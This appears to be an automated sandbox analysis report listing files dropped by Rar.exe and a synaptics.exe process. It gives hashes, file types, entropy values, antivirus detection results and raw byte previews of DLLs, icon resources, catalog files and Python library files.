                                                                                                                                                                                                                                  MD5:BC20614744EBF4C2B8ACD28D1FE54174
                                                                                                                                                                                                                                  SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                                                                                                                                                                                                                                  SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                                                                                                                                                                                                                                  SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..qm.."m.."m.."d.p"o.."?..#o.."...#n.."m.."I.."?..#f.."?..#g.."?..#n.."...#k.."...#l.."...#l.."...#l.."Richm.."................PE..L.....]...........!.....@...........E.......P......................................H.....@.........................pU.......X..P....................X.......p..<....R..............................0R..@............P...............................text...j>.......@.................. ..`.rdata..p....P.......D..............@..@.data........`.......R..............@....reloc..<....p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):552216
                                                                                                                                                                                                                                  Entropy (8bit):5.779566253639773
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:MaYPTKwDsuz9V/9SYeujF59CF5e3SnEEATLU2lvzS7u:nYPTRDD9ND58GqbATLU2lvzS7u
                                                                                                                                                                                                                                  MD5:8845FCF1AE2DE1018DAAAEA01D9BA2D5
                                                                                                                                                                                                                                  SHA1:DB67697EE052738E6F23CC1D29B261BEF1D423E5
                                                                                                                                                                                                                                  SHA-256:B7E16AF3EFF9AB0869CFE60C256394A70A867879B7F56544A724D6AC1CCFAB88
                                                                                                                                                                                                                                  SHA-512:2792FE94DD35B594514C4FAD091C9683EC47814335D046F776CD1F043C576533E99088949F1F1AE6814C16DBDDA430EC53B2D64621EA0C818CADB91EC5E3A788
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<...x.._x.._x.._qf._t.._7b.^z.._3f.^z.._7b.^s.._7b.^r.._7b.^z.._.b.^{.._x.._..._.b.^T.._.b.^y.._.ba_y.._.b.^y.._Richx.._........................PE..L......c...........!...".....4......."....... ......................................P.....@......................... =...N...........0..s............>.../...@...6...,..8............................+..@............................................text...-........................... ..`.rdata..*k... ...l..................@..@.data....;.......6...|..............@....idata..dA.......B..................@..@.00cfg....... ......................@..@.rsrc...s....0......................@..@.reloc..)>...@...@..................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):75809
                                                                                                                                                                                                                                  Entropy (8bit):5.969322217946821
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:+sNNRmOha6UEm3BL61Z4tXSZ6HTk1FaA87Gl6L:+2No6UtB+1eJ9Z
                                                                                                                                                                                                                                  MD5:B35F68A3086562C4D5453FAAD5A3474E
                                                                                                                                                                                                                                  SHA1:673904FF9B305A6600E47AD715289122EC0B046A
                                                                                                                                                                                                                                  SHA-256:150C470F9943B806B44312EFDEC85755F22F8D7D52B31F93A9AF3C43E8627381
                                                                                                                                                                                                                                  SHA-512:6EC80921942B3BD3C85EF24A2DE5454A34A3AD11A1BC69B601AEA7B873E318073C0B2D78C26685999F78EC64A86282C08C53AB8D77E41C661AE968EA52C08176
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...............7......@@......(....8..00...........N.. ..........m]...............f..........h....l........ .t/..Er..@@.... .(B......00.... ..%...... .... ............... .....1......... .h....#...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..{.$.}....w........X..V.....F..]..T..P.H().........P)..<....Y..%%...[B2....2."..\......tOwO..9=.>}^=.5s.....==gz......;..;.T.x..0.3.x.....,.l..f.a..0......`..0.....a&.6..3...`......L0l..f.a..0......`..0.....a&.6..3........_.ro...Y:>.T...V...0c.......3v..X8..0c...56.....f,.t:..,.l....#......k8...l....G..1.u.6..n....5.......w.{...N..ND.\'P.......j...1.!.u+n..v|.._... ..>.....p.....}.v.y.h6...N...%`....[.l....F`.a.....og#....`..6.....f.`#.p..`..6.....fla#0...0c....q.m.9..{......3.\v.e....>}......."...p..w8E.l....`V..........H..l....e.]..~..Nm'....`V$.v..G?.Q...l...0+.6.v..0+.6.f..0+.6.z..0...].........q...O..`..L..w.v6......#....(...a..L.l....`&.6.)+~Y.........aY.{.r?..{.n.....{..F...o\QK.s..L47.p
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):78396
                                                                                                                                                                                                                                  Entropy (8bit):6.10453452748711
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:WNXYu6xYBxqjlETx2UjHe20dH397tiKZoZa1ABtc8Yg2zR51ZV2vL2inK/fR1:sayx2lETxN+HTo8+bil1ZqdKX
                                                                                                                                                                                                                                  MD5:B1C9980131A3F20E344AA3AA2C8DEA49
                                                                                                                                                                                                                                  SHA1:0FE02F0ED5E56BBE7E4E98B1DCA061ED17FBF5C7
                                                                                                                                                                                                                                  SHA-256:FDA28A734788A3F175CB6AED4DAEB5F05F0E49F6A272CCD2051BA337F7B3B42F
                                                                                                                                                                                                                                  SHA-512:84CA107ACE44FA1964C6C1EA93FC767BDE88363339FC426A3D660DA53C84BADE14F1FAE99C494483BF2B5312938D84B0C1733C85E82592B8FFE8A28F76186A3A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:..............r?......@@......(...8@..00..........`V.. ...........e...............m..........h...xt........ ..1...y..@@.... .(B.....00.... ..%...... .... ............... .....L$........ .h....-...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y..W}..-.^....n.v.lK..@.../.,....`...s0g.@.0.d...8.@B&..9.'.@L....NX-..-.8v[.. ./-....zU..[..[.....w?...zU...[.-......=..#.h4..1./..h....4..F+......@..`...h:...4..F+......@..`...h:...4..F+......@..`...h:...4..F+.....O......x.9..:...t..lB{...B+..E+.M.....j%0Ah..i;,........m.....@.hO`.h..i{.'0v...=.ei%0F.. .C..M.+..<....w..d..~g&.j.*.y.uQ.T`Y..:....w.:.......y.t.BH.w.}.....v..#X.x1.....$0..F....8..<J.R.z8..Z.h....&...4m..'P.V3]..@6...........J ...4m.V...V...D+..A+.M.r.....j% F+.M[s.....Z...}.{Z.....=L.dI..9sF{....4......V.2.'....f.=....@3.h...t%...f.q...L^....Z.hf%.......3g:V.h....h%..V..Y.V.j....z.......#.J@.V...A+.$Z.h:...A,\.0.......t.........@3&fz..4.p..c....w.......\c.].g.....o...n....m.6.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):83351
                                                                                                                                                                                                                                  Entropy (8bit):6.269678824341842
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:fVLhV30CuzZO5Wf/DGsea4SNum23KXVDTEhr:f1hV3Uz447lea4muXG1TEhr
                                                                                                                                                                                                                                  MD5:1A8230030D821CF8EA57CE03AAEAD737
                                                                                                                                                                                                                                  SHA1:12656788B1FBE4D2375ECC2989A4D9DA69CAA0D6
                                                                                                                                                                                                                                  SHA-256:C4EC1845A5724B2A83500F3BD940355E2FE26EFC6B4FE6C208365359A6130DA1
                                                                                                                                                                                                                                  SHA-512:AF6356DC67249E724AE30F65DDEFB4E53C6F2703DA32FD5F135598BBD6189BEE70950242F52985478DE99979D1271EEC9F4E2981A29A9BC02C673E9B668FD0C1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...............H......@@......(....I..00..........._.. ..........hn...............w..........h....}........ ..;..@...@@.... .(B../...00.... ..%..W... .... ......&........ ......7........ .h.../A...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y...u.....u..l3..+Ar...)B..-.c...Y....X.$[....r..c.;>I..>..(...X.m%..G... ..H.....F,..f....~.T..W.^U...Yz.}.S....5.|....S^z.%H$...7 .H..i.$.e.4...2F...d.#..D....@"Y.H. .,c...H.1..H$..i.$.e.4...2F...d.#..D....@"Y.H. .,c...........B.d~H....G>.,.},%d. i......H. i9../.R..&!....0.C..&!...%.F.9H. iY...=..HZ.i.f.4...G...i.:.8....-..9.m..y>.G.\...x...~......O."......0".#F@..$c...B>.l&M=...........qm?>.K..?...azz:.Zi..#...E...../..t:.{...$C..IK0.n...._FGGG....#...e.\7......@...@.Rl...../J#.$.....[6..'_.9.f ...%..@s..@..H`.H. ii.l.......5.._..W.....@.......D....F.B...@....@.d.F 9..H.....$.....@...u3>.S...vzz..........@.$yx..~.g...w..Y.F@...E..x...,i...F...G..p...,...=.....f......@.lx..'..~H...b....,+.~.I|.#?.t
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):170264
                                                                                                                                                                                                                                  Entropy (8bit):6.693484567356425
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:M5QtHVOqzYcylPwZzS8JqTuo0BmSWjIuVBY/xux08YvVILLh8ptCuX5x+:M2tHjzYcyu+unESWXA/xaYvD0
                                                                                                                                                                                                                                  MD5:92C72753FA5C8EAA615B007F89CDB482
                                                                                                                                                                                                                                  SHA1:34238E31E0D963838FF551B184EAB3267767AD12
                                                                                                                                                                                                                                  SHA-256:EBBDE07AFB2BB356CD400E97D8AFB5ABBC121CC0CC90F99BEC9C3FA5CA60DE14
                                                                                                                                                                                                                                  SHA-512:A80BBA7095E7178591266E411414B3A6A2CBA09B79F330631AC07A72C6EB2AFD1C50D7346938ED337A911307B15660C17D14FACC7AFC6EFD9759BFBEC2121BD6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i^C.-?-.-?-.-?-.$G..#?-..J,./?-..J(.!?-..J).'?-..J../?-..J,./?-.fG,..?-.-?,._?-..J%.)?-..J-.,?-..J..,?-..J/.,?-.Rich-?-.........PE..L...M.,d...........!......................................................................@..........................:..P...`:.......p...............j.../......( ...5..T............................5..@............................................text............................... ..`.rdata...U.......V..................@..@.data........P.......2..............@....rsrc........p.......>..............@..@.reloc..( ......."...H..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):162444
                                                                                                                                                                                                                                  Entropy (8bit):6.899798696437328
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:t01xIh2ISDWCMiVQwmXWFRlbIMWa1PhWkRtjNsj2+1/L3kr7Sy5Pxy:t0HIcI7C/ZIWVbZhWijNsjxkrvxy
                                                                                                                                                                                                                                  MD5:830E831E1896D35A5E414D518AC05A2B
                                                                                                                                                                                                                                  SHA1:D43B639FA1D0614EE40A85483998ED7C4996AB19
                                                                                                                                                                                                                                  SHA-256:739B93F1ABFD7E6188F0C86172E526DAD72E29E0FC177E4B8C4E3686DD90AE9B
                                                                                                                                                                                                                                  SHA-512:81FD4E1E2D376262B9F0C235EA817ECD608FE3B734CA25715BA64E33D831A330DDE5D68C3F821C540B442727D3B008103E584E6CC91DACBA6F17C0D31A7CF4C8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:0..z...*.H.........zw0..zr...1.0...`.H.e......0..K...+.....7.....K.0..K.0...+.....7.....].GkN..D.n...]....230405005111Z0...+.....7.....0..K.0*......T...Q...w.Z...g.1.0...+.....7...1...0... ....%...%......*.].4i,`..(...1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ....%...%......*.].4i,`..(...0*....T..|../..IT....Q.1.0...+.....7...1...0*.....'......s..%R=5..1.0...+.....7...1...0*.....K..`....T...#\.1.0...+.....7...1...0*.....2m..3.......N..D1.0...+.....7...1...0... .......V.C.........>..wf...O...1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .......V.C.........>..wf...O...0*.....KG{6.8.o.<v.....1.0...+.....7...1...0*...7.d3t.[....Fh....!1.0...+.....7...1...0... .k.r.....r...K=.w.&.....mY+..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .k.r.....r...K=.w.&.....mY+..0... .l..x....h......=....'&.ZZGe.7.31i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .l..x...
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):31213
                                                                                                                                                                                                                                  Entropy (8bit):7.250253600675095
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:e+Obmujt2xtYZtMPgs+03HQIYiSy1pCQAGy+Pxh8E9VF0NyOXz0:eE0tQYYPf5YiSyvny+PxWEUQ
                                                                                                                                                                                                                                  MD5:E33C9E857AD27ADBE33B26AB13890657
                                                                                                                                                                                                                                  SHA1:D70E576009A35D201399059DBE6DEAC35E1AC168
                                                                                                                                                                                                                                  SHA-256:EDE0345311D5D825BA03E10423CF51515B3F3962F1286E46E1E6198ADFEC67CF
                                                                                                                                                                                                                                  SHA-512:AC370602AC8E55E5B524AC5E961CC5185978AE8532A29F24B6F806E3355530C3F67127AC2F65FE4849AC8B354DE7D1102B8E11FB3C5457A5548B1125209FE913
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:0.y...*.H........y.0.y....1.0...`.H.e......0.K>..+.....7....K/0.K+0...+.....7.....1..4.&N....XE...230405005423Z0...+.....7.....0.J.0*......n)z;.....n7...1.0...+.....7...1...0... ..ok..m.e,W=:a.VS...<....v.L..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..ok..m.e,W=:a.VS...<....v.L..0... ..7]Y....M..u...8..([M.A...}...91i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..7]Y....M..u...8..([M.A...}...90*....[2j[...kSR.V....81.0...+.....7...1...0... ...F....(.jg.cc]..<.t.1..a.&c\..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ...F....(.jg.cc]..<.t.1..a.&c\..0... ..d...m..'...n.L!...>..S.sU.g.1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..d...m..'...n.L!...>..S.sU.g.0... ..?..."`...^.M..|...D.....@C....1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... ..?..."`...^.M..|...D.....@C....0*.....v.ow......6:.ZGU,1.0...+.....7...1...0... ..#|.!+.Hy
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27416
                                                                                                                                                                                                                                  Entropy (8bit):6.835600420682668
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:+WFXERsAnq2NWow4VILQGR5YiSyvLPxWEa0P+:+xqwWow4VILQGf7SyzPx+
                                                                                                                                                                                                                                  MD5:6EBA3E39E61C839818F502BD67BBD672
                                                                                                                                                                                                                                  SHA1:CD724D843CA57F6EDBBBE94B3C352769F70AED65
                                                                                                                                                                                                                                  SHA-256:C942F16C17687E988434813E50D2FB222C528D0E56CCF2D15B13104676F93FC9
                                                                                                                                                                                                                                  SHA-512:8614F4DBF7DF68D66BA611B31135EB35EF5C6D24E1C3F3EC4E8DF67BE75102DA991F26FEA76EF930B686A1ED08AD4A4C5F62CB2BEA4233B26D276FFD3C54FC31
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5$..qE{.qE{.qE{.x=..sE{.#0z.sE{.#0~.zE{.#0..{E{.#0x.sE{..0z.sE{.qEz.LE{.:=z.tE{..0s.pE{..0{.pE{..0..pE{..0y.pE{.RichqE{.........PE..L...H.,d...........!........."...............0......................................u%....@..........................:..L....;..x....`...............<.../...p......D6..T............................6..@............0...............................text............................... ..`.rdata.."....0......................@..@.data........P......................@....rsrc........`.......0..............@..@.reloc.......p.......:..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1196824
                                                                                                                                                                                                                                  Entropy (8bit):6.776326140308749
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:E6OOR2q+dGpg4XzLojJT5r6hKarVTgnEEUNTZOdEV8RpDq+m5:zR2L94Xo5Q5OEeEYDzm5
                                                                                                                                                                                                                                  MD5:C60F6C4051EB55350C6EEDF5A87016AA
                                                                                                                                                                                                                                  SHA1:DB1C31C12BE04A5785D7CA3B8EA91B290EE9D1D8
                                                                                                                                                                                                                                  SHA-256:376D80DB08CEC2C8873A4D5EBC7D83F50F26A43EBAA837020874C8586FD85975
                                                                                                                                                                                                                                  SHA-512:FCBDFC27A778B1084BE96B88CF438E0937ADB8BABC41B538892B76283232AA557CE46701A8F62AB2FDB208AB0933F0E473CBD6DAD59203DC7495F48EE289B2A3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z.............^....L.....L.....L.....L.....U.........................2..........Rich...................PE..L.....,d...........!................_........................................@.......7....@.........................`;..."...].........................../...........5..T........................... 6..@............................................text............................... ..`.rdata...Y.......Z..................@..@.data....'...p..."...Z..............@....rsrc................|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1114904
                                                                                                                                                                                                                                  Entropy (8bit):5.393522969186712
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:PAKqQCb5Pfhnzr0qlmL8klMmuZ63NGM7IRG5eeIDe6VZyrIBHdQLhfFE+tc9S:PAKsZV0mmduJMMREtIC6Vo4uLc9S
                                                                                                                                                                                                                                  MD5:73A25EF47977BFF82315023F7F8E9DB1
                                                                                                                                                                                                                                  SHA1:9BD7882C39A995EA4044FB5D562060C16AF9A023
                                                                                                                                                                                                                                  SHA-256:AC2966C1A1F1FBEE97666E0AAADE5AB960B445AF3BACC1650B83EA8B637F2F7A
                                                                                                                                                                                                                                  SHA-512:C6155957E37C7A690E815F78508CCDCE9036E2EFFE45A9B47EAAFBB8A091D661B808C1A2CC6C7B83B41752121B869A877C981EE346B790F3CF3900A3D6F0B198
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........#..p..p..p...p..p..q..p..q...p..q..p..q..p..q..p..q..p..p...p..q..p..q..p..tp..p..q..pRich..p........................PE..L...K.,d...........!.....8...........=.......P.......................................X....@.............................X................................/..............T...........................P...@............P..,............................text...J7.......8.................. ..`.rdata...}...P...~...<..............@..@.data...8...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27928
                                                                                                                                                                                                                                  Entropy (8bit):6.803210417146149
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:8wPBcVsin9R+URILO7I5YiSyvCJPxWEau:8wP2L9R+URILO767SyuPxb
                                                                                                                                                                                                                                  MD5:49F55D492AD016A6F0D0183768F8C903
                                                                                                                                                                                                                                  SHA1:0001BFFA17EEF519406710FA18808047EF19B590
                                                                                                                                                                                                                                  SHA-256:865C296E84C03E277145DC8DEE6E14C2AC418371A8D227576682ED596708EED8
                                                                                                                                                                                                                                  SHA-512:B0B57AF43FF2A3498EDCEEFAE71E253B3D9AEF23086D2BB41779A8B370BBA2801CA0CF5EFDD998E4415CB2EA61AFDA028BD1781C2DBBC8D1C157425B12D861DE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6o..W.[.W.[.W.[./.[.W.[.".Z.W.[.".Z.W.[.".Z.W.[.".Z.W.[)".Z.W.[./.Z.W.[.W.[.W.[)".Z.W.[)".Z.W.[)".[.W.[)".Z.W.[Rich.W.[........................PE..L...L.,d...........!.........(...............0......................................3.....@..........................<..P...`<.......`...............>.../...p..X....7..T............................7..@............0...............................text...T........................... ..`.rdata.......0......................@..@.data...p....P......................@....rsrc........`.......0..............@..@.reloc..X....p.......:..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5302
                                                                                                                                                                                                                                  Entropy (8bit):4.761272492188341
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:iO+uujd+ShBkhGL45k3XYgvSEMkQFne2b1HDG:D+uSkkEknNvSEMkTk1HDG
                                                                                                                                                                                                                                  MD5:903D790CEF59478A60829CC3F6978890
                                                                                                                                                                                                                                  SHA1:3D7A098629D4217D34097FAF3DEE431A9A93B5C9
                                                                                                                                                                                                                                  SHA-256:70A3FB890DE3673DA0118F401F54E5C6B22639F45CDA7834F638EC3198DDACF7
                                                                                                                                                                                                                                  SHA-512:CD09FF62092C460B745FC6241F3F6D79B81D0B22FB541210C0D510314FD6209768F058FF4F76666D5B11BB9A0DF48F3DA6859DEBAB477598B302E44A25059C95
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Record of phased-in incompatible language changes.....Each line is of the form:.... FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",".. CompilerFlag ")"....where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples..of the same form as sys.version_info:.... (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int.. PY_MINOR_VERSION, # the 1; an int.. PY_MICRO_VERSION, # the 0; an int.. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string.. PY_RELEASE_SERIAL # the 3; an int.. )....OptionalRelease records the first release in which.... from __future__ import FeatureName....was accepted.....In the case of MandatoryReleases that have not yet occurred,..MandatoryRelease predicts the release in which the feature will become part..of the language.....Else MandatoryRelease records when the feature became part of the language;..in releases at or after that, modules no longer need.... from __futur
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):65
                                                                                                                                                                                                                                  Entropy (8bit):4.094714259436315
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SbFQZhHFSbWQRSLABKCW5:SbFsBwbWEQYKx
                                                                                                                                                                                                                                  MD5:21452BCD01B4FA606D021E2A35A41918
                                                                                                                                                                                                                                  SHA1:63D058B0E42269750CE9FD4CA5049C57F6E26CAA
                                                                                                                                                                                                                                  SHA-256:AB3048BB63BB222868B04BED809A534986466828A6983C2686CE048C4F198D18
                                                                                                                                                                                                                                  SHA-512:F97089BB79A2E26A7D405BDA1B34C5966C55CCF1005CF88A627DD10625F526F530A74CC4A14A19DD75E6FD538796BB9380BE9D96AFFED75A8D77552380548FAF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This file exists as a helper for the test.test_frozen module...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4142
                                                                                                                                                                                                                                  Entropy (8bit):5.362666268605498
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zgdNzUuGd+P2sKNUWhom2j8kQAnPPELBG0uY:q4BRRhom1gPG00uY
                                                                                                                                                                                                                                  MD5:0DDBE37617EEA523BFBDFFC54DBA6B07
                                                                                                                                                                                                                                  SHA1:E40687473A48832B5478222F718A18B38F96F218
                                                                                                                                                                                                                                  SHA-256:AB7FA314B7816909769CB4ECA4352D0A4294C8B2C997D708545A782E9E19BD6F
                                                                                                                                                                                                                                  SHA-512:B2565EA039018DB3BD7F2E293394D6AB0952B7DFE44742164C40CE003ED49E490EDAC597104160F6D23BF6D6E5858DA095E1C82DEA2C0921C91FF1745601CF42
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.g.e...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.d.S.).an...Record of phased-in incompatible language changes...Each line is of the form:.. FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",". CompilerFlag ")"..where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples.of the same form as sys.version_info:.. (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int. PY_MINOR_VERSION, # the 1; an int. PY_MICRO_VERSION, # the 0; an int. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string. PY_RELEASE_SERIAL # the 3; an int. )..OptionalRelease records the first release in which.. from __future__ import FeatureName..was accepted...In the case of MandatoryReleases that have not yet occurred,.MandatoryRelease pre
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32936
                                                                                                                                                                                                                                  Entropy (8bit):5.03513700995287
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:WpD38l+6pg6mG5JlooICwimTmIufuBEQtJHVDOA/8AH:usl+VVSooICwimT3ufu+AJ1DOcvH
                                                                                                                                                                                                                                  MD5:BC0C6A46BF4F7E85508E0C3B2F20A626
                                                                                                                                                                                                                                  SHA1:A95BFDF351823DE14F877A3AEF05221BA9817367
                                                                                                                                                                                                                                  SHA-256:701EB46C5709F7F330E9BDFBBEB7AC87E2E3AA5B3EB59C5B0208318473925419
